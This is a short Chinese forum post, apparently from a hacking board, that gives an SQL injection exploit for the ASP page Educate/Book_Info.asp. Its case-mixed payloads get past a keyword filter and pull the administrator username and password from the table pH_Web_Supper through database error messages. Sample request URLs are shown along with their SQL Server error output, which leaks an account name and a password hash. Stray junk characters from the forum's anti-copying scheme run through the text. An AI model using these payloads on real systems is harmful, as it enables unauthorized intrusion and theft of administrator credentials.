漏洞出现在Educate/Book_Info.asp 7 r; e# Z% O# F# ?; S3 k
# ]9 p3 K6 V- t此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出: u# ^4 E) C' l- R9 M- Q
; g" z' @) X4 j2 G, Z
exp:如下
6 i: K. g8 j K9 F5 G查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 M6 |( k. g* r$ \) v( T查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% m$ _3 J0 `2 N1 _% V
6 _9 `+ N0 W3 z i# rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& E% `; K+ T0 m/ @8 {7 C . E; t! n* e% l
Microsoft OLE DB Provider for SQL Server 错误 '80040e07', z6 D/ W- Q1 C
) Q2 q& m, s: ]3 y2 ^9 D
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。8 l* ?( T$ s# h& i$ U, H
* G6 ~( s3 K- w/Educate/Book_Info.asp,行 8
' y; Q2 u5 r$ m [. F2 }
' _+ T9 K# e6 ? m6 H' chttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 q( f: o3 [8 d/ F
, R- w2 U3 b/ H& cMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
+ i3 B/ g: y7 p/ F$ D ( J' L: L2 W" l
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
: u* t1 k/ N7 s! e+ O+ ]. `$ r
# P9 m$ z- C" P0 w+ H/Educate/Book_Info.asp,行 87 `4 C- u8 t/ l7 w2 X% f8 t6 h* K
|
发表于 2013-2-16 21:44:16
收藏
支持
反对